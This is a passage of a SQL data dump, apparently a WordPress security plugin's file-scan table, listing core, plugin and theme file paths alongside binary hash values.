CQ��yE�7�h6�N','�B\Z<0�~Lд��Uf�솮�2�pW�\0�	l','',0,'?'),('4�]g�Y�^l��2��W','wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�np��ˊ�T�6kL','_\0n��Sኹ��Jb	�\n��^���HT�\Z0dq','',0,'?'),('4�&Q:ͣ�ٙS\\&	Qa','wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tײ�m�ӭ1�\'O&y','��#�I��3\0/��9���]Z�d6�P�4\0�\'(','',0,'?'),('4�V���u,�Sܖk9��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�N,���� �.','�(2Ф���~�J��������r�J��VsJ/!\n','',0,'?'),('4��k*�hZ�ߘ~)k\Z','wp-content/plugins/wp-fastest-cache/js/lang/pt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\Z�H�L51��?�~�G','��ZW��Ѣ�\r�ءp��~1ֆ*����H��','',0,'?'),('5\0+�wZ�7U*u��','wp-content/plugins/wp-cerber/assets/flags/st.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@:\\�f�\r���!\0��','��������M��lM��{C�Qo^�V�ZV�','',0,'?'),('5Ke�w�^`V�j.�P�','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-multicheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6f�q��p[�C�}�','vl掑�~��$���+UÊs[�d��p\n��	','',0,'?'),('5��0�J��@(\0`M','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;������z,/c̝�','��>D��v�g�T�����\n���t�Ž�\r@','',0,'?'),('54��Z�ʗ�HJ','wp-includes/blocks/rss/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0^<ڸF9�gոɭ','l:�a+��2��\0M1��һu���%^���M0','',0,'?'),('5��zb@dA�c>��A�','wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��zz!\\ML�\"\\�ʩ�','��ÖǪSln��7�|NR��]��x@�����','',0,'?'),('5�?��y��<�2�','wp-admin/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS�E���z�C�\'�9\n','8��T�.(�e�0yV�X%x�z\n�Lyt�','',0,'?'),('5#t_!�]�#�[����','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5aij�֩s�@�|Ԑ�','�S2־�ґ�>�$�B�#���P|<K6��k|','',0,'?'),('5.=���d)<p�eu�s^','wp-includes/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�E��F�)?4um����','�q����z�p�5\Z��UPP�炘�|q�$/t','',0,'?'),('56AA���ѹ�A\r	�','wp-content/plugins/wp-cerber/languages/wp-cerber-cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�[��w�׺]Q��J','��U7�e:�%�\Zp^���\r=��B���dc�}\n','',0,'?'),('58�d�`S61K>ۮ�v','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0����ü��Ki','��8O�\\���[��xM��hPܞ�z��W`l�f��','',0,'?'),('5C�)\nWu�꽝/F�cK','wp-includes/js/plupload/wp-plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bi�^�̹�$�x�9}z�','3}�ʞi�����8]`���Q���ଧ%6','',0,'?'),('5S{�TƁ���e�/�','wp-includes/class-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','77F�b�w)x�\r��','\"���L\'�bE�G�M1{ՠ���6����','',0,'?'),('5Z����Sμ�v�`6�9','wp-includes/version.php',0,'�q!6\Z��u���Q','�q!6\Z��u���Q','O����+!�^���$��2��\09���婡\\�G9a','',0,'?'),('5\\h>��w	���N�','wp-includes/registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('5`�]\\ͭi\0���\ZJ�T','wp-includes/class-wp-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�a�j%�d:1M','��J�WԐg\"܏�艸�(����h>C����','',0,'?'),('5vQS\0zX���B^���','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؒ�ț�:��4k�W\\�','_��p�W�Ʋ�fs�r���;\"+�K+��o��bx','',0,'?'),('5��92���^�%<��','wp-admin/edit-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m,��E�O��:���','��*K�ۗ����Q$��ڱoAx��]��D Q�','',0,'?'),('5�7�N	C=��-��c�','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�D�K���zS§0','N�Q�*��TZ%P��%���jܑtZn/�','',0,'?'),('5�#t�5R�шK����','wp-content/wflogs/config-livewaf.php',0,'��d�a�T2�bj','��d�a�T2�bj','�F{�*�j$Z�����nc�8^b�H�N�q�','',0,'?'),('5�M�6:�Ӷ���,','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:X\\%?����ӥ','��ٜ�d��Xŀ�x�h��M��vw�$8','',0,'?'),('5�G�E�|#�\Z�5w�','wp-content/plugins/disable-gutenberg/inc/plugin-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[���tƉ&D��d��','E��6a�祇i†�S\0�RӗB�4�}nǪf\' �','',0,'?'),('5Ʋ�઀?�\n޳�Ȋk','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/core/fontruler.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׌Cqߔja����u','����7�A�\r��둑x���Ls.�Y�A��ٸ','',0,'?'),('5�H# ��t��-A�R','wp-includes/wp-includes/class-wp-image-editor.php',0,'(\r��^��k���+)','(\r��^��k���+)','�GY��<\Z�����\"B��v�Ԅ��2K9i��bQ','',0,'?'),('5�~\Z�3nP��uP.d�','wp-content/plugins/wp-cerber/assets/flags/fi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�洩se4�S$\"}�E�','5p\\�)���O�P�~�3�nAy?L2�%��qyP','',0,'?'),('5�;fm���D7JE�','wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php',0,'P��ef���i�\'�jW','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('5�r��Yķ��\"���Q','wp-includes/wp-includes/js/wp-emoji-release.min.js',0,'�d͢7@$��g�;','�d͢7@$��g�;','F\r�R7��s\"YX^�ȹ�$�y�ss[','',0,'?'),('6}��O%C��ˉ\'','wp-content/plugins/wp-smushit/app/assets/images/plugins-smartcrawl-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[6��bK\\��M�j','Sw��4��Ěm��sfGr�L�UM슡��Ep�','',0,'?'),('6����X/��HL','wp-includes/js/mediaelement/wp-playlist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��n�-ϓD)G��,','x���Q�hN�H1�̙�Ѹ�b\'��õ\nS','',0,'?'),('6;I(�H�m�%��f�','wp-admin/css/farbtastic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\n���)�{��','T�=�Y#��[���vr�H�ia��R���','',0,'?'),('6[f�9�?�� _�','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&���Ɍ����ԔQ<','1���Nߗ����׍?*�i�í!F�Mp�9^.','',0,'?'),('6c�b��kk��i3�@�H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m}�#`:��Po/�','�(��˕�=9L�/��*m�,{o�7ܺhVT��\\','',0,'?'),('6iWq�גȲ�W','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/monotype.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Et�������k�F�',':�XZ[t��0��&�<�[n�Z�G���-���','',0,'?'),('6iD��6�l��)�<�','wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�Ґ-��\r�Y݇','��.�n�Z�9��(�IuW�6]v0_�Uo+','',0,'?'),('6l�ݝ��znj����','wp-content/themes/hitmag/inc/kirki/modules/css/class-kirki-modules-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C���	ՔU�Ƒp�','�\\o�k�Gj�2\n��dfz�`9s�m��˅ػ�','',0,'?'),('6~�Z��~�s���','wp-content/plugins/wordpress-seo/src/conditionals/user-can-manage-wpseo-options-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k��ゑ\nҞ0Y�','����#�j�~(|�w��J�U��i�L�~','',0,'?'),('6�]j�v�W�k\r3-�','wp-admin/load-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��|�=]gY[\0�M��','%���`ĸ���X�&IJǼ=~~bF�]�FSD��R','',0,'?'),('6��ƌ���C���+','wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�{چ%Jm��׉�','��F���pd��3�����\"�n��Ʃ Y�b','',0,'?'),('6�3ȓ+Ό�!��','wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CY�oy�4����%���','I%ik/�ȅ�����`D�Zm���Z�sY','',0,'?'),('6�b��C#$\Z�	3mu','wp-content/plugins/wordpress-seo/src/conditionals/admin/doing-post-quick-edit-save-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���-�o�Ed&���','�	�s�\0Ր��E2�H���mཱ\n�Q�\n�','',0,'?'),('6�����`�5�f6�?�i','wp-content/plugins/wordpress-seo/admin/interface-installable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B��\nQI��<','Qf�j����Ų�yR�;c����r���\"�8+','',0,'?'),('6�lLX/��H��3X=E','wp-includes/blocks/template-part/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\"�.`�Xxm{��','\n+|\'x�z���(��=j�n}#wW��i��2N','',0,'?'),('6�(_RG\\`>��\"&*�','wp-content/themes/hitmag/inc/kirki/assets/images/2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f˾�I&�D�㿃ن','@�����0��֕m�T�f��l7GM$�','',0,'?'),('6̠,��_���q��u�','wp-admin/includes/class-wp-filesystem-ftpext.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߸*�ؑ,��xo���','��\\�Y}�ei��^�wD���AE�k�iZK','',0,'?'),('6ٚ��ك��F$2','wp-content/plugins/wp-cerber/assets/flags/pk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Lhe͑3�z$��k ','L�r���#���ྼ\'X���=J��)yh@�*j','',0,'?'),('6٨	�:{�^D�','wp-includes/js/jquery/ui/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}�yGL���(','�W��C2~�A^!:ؤ3x r��b��(p�>fi','',0,'?'),('6�t\'�\\�	y18@Q\rt','wp-includes/wp-includes/deprecated.php',0,'���X�;|N.��S_d�?','���X�;|N.��S_d�?','S5�g���*����r����x�{��&','',0,'?'),('6��@�V��/�\0','wp-includes/blocks/comments/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q4�ɞ\0��}','���9��djr&��~�E������k��j','',0,'?'),('6쥖t+�vV�O���','wp-content/themes/hitmag/inc/kirki/kirki.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R%V�l�\"Ie)K$�\Z','fDX��n�\'bqu\'��29�-��0bҐ�^�','',0,'?'),('6�[��L�76���b�','wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�;9���ʅ�8�0','z	�&�\Z٣��>�Wp�tS|I���ĠZ�?','',0,'?'),('7\0@�+����ۨ��1','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/Byte.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��6)�\Z9#D�\Z�','�c4��{pFY[��i�L~3�x�����S�E�<g','',0,'?'),('7VB\\�%���B�V','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/SeekException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nx^l_�8:�p/9','ߐ�)t\'\\�&+ԘT�惤�%�Z�֏7��','',0,'?'),('7\"��妿W�\r��ѽ�','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��Ǔ�GJ��','�2��ެ�ijB���]ƑF��BN3��yk�','',0,'?'),('7\'!����ܺ=U�N7','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/QRCodeDataException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6��,�~�','��S��\"������D��\r�q$y)�\nk','',0,'?'),('75{a6�\n�H$oC','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Helpers/BitBuffer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\r�G��s��b6�','���-�|�7ц��nB˔�m>|��\\�*�L','',0,'?'),('7?�H�C�)W\\��<�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-reset-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oz�d��1h�>FS.','\r�-�ѹ�ob�\0m0����b��zB���','',0,'?'),('7@��&HV��k���:��','wp-includes/wp-includes/sitemaps.php',0,'gG�xN�)�/���*','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('7A�lU���n�jr���','wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-4.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��U�;%�\0�Ď\ZJ','˕�C�F�j��\r��vG�O��Lon}}\\','',0,'?'),('7R!��E�������','wp-includes/wp-includes/theme-compat/sidebar.php',0,'(�S��;��I��(','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u;	\0�&','',0,'?'),('7cqT�$=�Z�吽�V','wp-includes/wp-includes/css/customize-preview-rtl.css',0,'��މ����ګd��3','��މ����ګd��3','~�\'��[z�{��:����LĀN7A��	','',0,'?'),('7oj@��J� C�ȿ��','wp-includes/blocks/site-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#ϩ\Z�\'g���:','B�C�\"T�B$�5�TGwGA��*R��z�*Jo$','',0,'?'),('7r��uF��@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�K_J�2Cmcͭ�t�','D��jy��,�Lw�a� <U��� ����S','',0,'?'),('7u�	j��x�r5���','wp-content/plugins/redirection/locale/redirection-en_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3���z3��!��^-�','�.��8*�u�����jd�±���+o���i��Z','',0,'?'),('7w�1�J�0�k','wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K렊o�����$`�','}A/�V\\���0\0ֿɘK�m�G��\n��?���s','',0,'?'),('7|oOU���z\0Ef���','wp-admin/network/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�;G_bu\'\\','�v,I/L^���ww\ZX1�2�y�T�ɣI��~','',0,'?'),('7�P�Y����i���ߝ','wp-includes/wp-includes/js/shortcode.js',0,'@�������P}�SΊ','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('7�ua<�(.��L՝H(','wp-content/plugins/wordpress-seo/admin/views/interface-yoast-form-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N{\n�G\'�\rCj�B%','�T0V�l:\"��O� uU��u�Sv*��^bb','',0,'?'),('7�5�P۰�g{%hr','wp-content/plugins/redirection/locale/redirection-es_EC.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b?���zr�!ڂ\'-x�','rh~?L�@�6VK)C�j�j�����[�.�','',0,'?'),('7�%Wy~׹P?�x��','wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('7����3KNk�&���','wp-includes/wp-includes/images/media/audio.png',0,'�taCA���.��Z�','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),('7�t�1V?Iá�\"�,�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sq.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e����\0�#��','�֖�n��p�]�sH��0�%%��Y(��r�p','',0,'?'),('7���o^l�:���B','wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('7��jU��}@GdiS�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/TaskQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5I��e4��J�: E�','�V����?Q�޷�u�ތϫ9��1{%�c��o�','',0,'?'),('7������@�r5��','wp-includes/blocks/gallery/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GD���Bii;5�v','���|Z��V�ͭ.��f,�-	De)�q�\0g','',0,'?'),('7�X@Ej����d?M','wp-content/themes/hitmag/inc/kirki/modules/webfonts/class-kirki-fonts-google.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c����A��h���,�','���?F�4�[�\\\'RrQ��3Z����','',0,'?'),('7�c�¢)��S�eb�','wp-includes/js/jquery/ui/menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z{:nE�Gu\"Gާ','�w$[���^L\'�o���?��y�Ŝ��,W��','',0,'?'),('7�c�.$P!�\"�򹚆','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���j��_�ˊR�2','*��-�9�.���HGO6/�L�):�C�d�z�','',0,'?'),('7�ʅ����	��;h��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yף5�R���f���m2','�O1f�qZ\ZO0]����Ē&\r���@j}G�','',0,'?'),('7ϋ�t�d]B��?��','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/EnvNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�=&���	Wt�','�HS�l���8<*�p�3C��@	2�a�','',0,'?'),('7�Y|7�^\Z����Vq','wp-includes/blocks/site-logo/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�nT��x2 n�','��$`�t�#b��m��]�\rK�U��&X��','',0,'?'),('7���k�X�f�Xm�S�','wp-includes/js/dist/vendor/wp-polyfill-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sn7��z4f��M,��','e��b�����2w�\'�+�M�1��x?r&��>','',0,'?'),('7�2��_R�D��;n�','wp-includes/blocks/block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x�M�89W�','�)��Ҫ�m�Z#�[B-����#<߬�|\"��r','',0,'?'),('8�x>Ș����pԠ�','wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',0,'�h���g`ɸ:ڕ^','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('8\Z�kUje�Mw����','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ğ㣤V6�\\y9','�BCN05cٜ�\'���;c��ZS,�3��S�','',0,'?'),('8�W�넧j�`���','wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��>��nd��jh��I','�xy�Oax�H�6��Y�vbt�y�a�շ�v�Z','',0,'?'),('8��\"m9�!8���#?','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',0,'[M/*��E�<s�W�RG','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�—\nXj�\'�;q�{��a�','',0,'?'),('8%دTP�Υ��Ա','wp-includes/wp-includes/js/dist/annotations.min.js',0,'�%e���F�\"�8�]','�%e���F�\"�8�]','�U��8�E�]�\0{\"�2��Eh��$���*�\'�H','',0,'?'),('88��e�7Md�>�CW�','wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׬��?�����b','�$j���\'h�Q�Q���HTy�ݯ','',0,'?'),('8=�I��a�%��k�~�','wp-admin/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y�����e��','�:� ��z�=:&���%@����x�?	ScS�','',0,'?'),('8?6B�\r��pl2�R�x','wp-content/wflogs/config-synced.php',0,')p�e���Gk&��{�',')p�e���Gk&��{�','�IY�nky�4\0�`c썳+�\"Z<��f��/U1�','',0,'?'),('8P֧�\Z�HGE}8�','wp-includes/Requests/Exception/HTTP/306.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('8W��8�ƨr�d�Z�9','wp-includes/blocks/navigation-link/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��U9l0D	޹u','X��/j3�J&S�vߕ�����[8�[J��y','',0,'?'),('8Y���v���C�[,��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:\0��>������}LQ\0','���_U\0]q=Չ��f�\\�/�	@d��\r�+v�*(','',0,'?'),('8`�9p*;p���0c�Ac','wp-includes/blocks/comment-author-name/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Z/��i\0kr��c�','���\0x�u����)�{c	0�8�q�����H','',0,'?'),('8�\Z+��X/{��;�K','wp-content/plugins/wordpress-seo/js/dist/languages/sk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<M�Sr��igj��d��e','\r8�`��J[�pk�^3�\0���6�JBk(��_K��','',0,'?'),('8�>��\n!H����','wp-includes/blocks/navigation-link/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ad;qn|N^�!��;yu','k��XG��U󑢥��ֳɼ��Ec�if��\Z�\'','',0,'?'),('8�R6�DH��q�-{�:`','wp-admin/includes/translation-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݼ�˙k0�I�L��','4}Z��TK���,�k	N��C�rR\r#�','',0,'?'),('8�@)��6yg[y�sQR','wp-admin/css/deprecated-media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�8��;','� J�x�JV9�fo�)�����w�3�?','',0,'?'),('8�1��q2Y�O���%�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',0,'��#����� v��d','��#����� v��d','W�Y�0����2w��	5�O���zm� ���^','',0,'?'),('8ÛZE�Q$}UP�T��','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�铇�ܙ~�\r�m','%&��9�	/D�XG�؞�߇��U�����4','',0,'?'),('8�~�#K9{u%�y�R�','wp-includes/js/dist/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӃN��\\��0�؄\n','N�cb�<�O|kHD���dK0��^퀧n�','',0,'?'),('8ܞt��\Zw�Nxa��','wp-includes/class-wp-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��V�g�#�,����','X��g}��1Og49�R�yX<Ԡ|8�*�ж��ҙ\0','',0,'?'),('8������ʣ�y�`/','wp-content/plugins/wp-smushit/app/assets/images/smush-no-media.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R��)���W��','�c\n�d�h#��\nW-�O�,��\'��N�J�','',0,'?'),('8�Ox��E�����Xo','wp-content/plugins/wordpress-seo/src/helpers/input-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@�q��	0p�.\\��','~sg.E�it!5��u�^4#��D��u,��\"�','',0,'?'),('8�1rpz뽐�N?��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',0,'U,�:)��؋\"�QqY','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('8�|Q��f��~֭�\0� ','wp-includes/wp-includes/js/mediaelement/mediaelement.js',0,'��a\0����\Z^2�-!]','��a\0����\Z^2�-!]',' �+	M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('8�U�lag��k��Y6�','wp-content/plugins/wp-fastest-cache/css/buycredit.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FbǦI\'ET3��A��','��61��-�����\r$�7��;�~�֘�','',0,'?'),('8�kA+�_����Ln�B','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',0,'{�6�#UQ:��|>#��','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('9�\r5\'X���>?�','wp-includes/js/customize-preview-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('9ψ[�1d{���@','wp-includes/class.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�����$�Ϗ/','\rW|���K�x}��Z��g��O�y-�aϷ��','',0,'?'),('9)�k�ȗ��;K���','wp-content/themes/hitmag/inc/kirki/modules/css/property/class-kirki-output-property.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��egO��R�A^�ae','�Ul�dC*RM�իݨ!༕��K���=s����','',0,'?'),('9*��Ê��+8aW��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/zh-CN.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��tn,��_�r�','��.�>ڸ�É���`~@�����dF\n��b�','',0,'?'),('97��b�S2Sq樓','wp-content/plugins/wp-fastest-cache/images/loading-circle.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IL��f��{o�>0��','�p�6��$��N�(��y��osZ���\0�=N�]�','',0,'?'),('9:��d�o\n��p`Ry��','wp-includes/js/tinymce/langs/wp-langs-en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:w,�]�^!s�','����[� �l	̚�y��H-����\0��9�P@','',0,'?'),('9=�/Cq�]C��j�w�','wp-content/plugins/wp-smushit/_src/js/modules/directory-smush.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#|%`D#�3Z�)f�:�','ֱ��=�B��o�{mY��>Ϛ�������!\0�','',0,'?'),('9@�\\�gv�үy���','wp-content/plugins/wordpress-seo/src/config/migrations/20201202144329_AddEstimatedReadingTime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2#v�Xj�};2�b�a�','�!���&��m�j�ÌJ���ċy��g�','',0,'?'),('9Es+��\naj)���','wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���e\'���k�K�','��4���	N����� 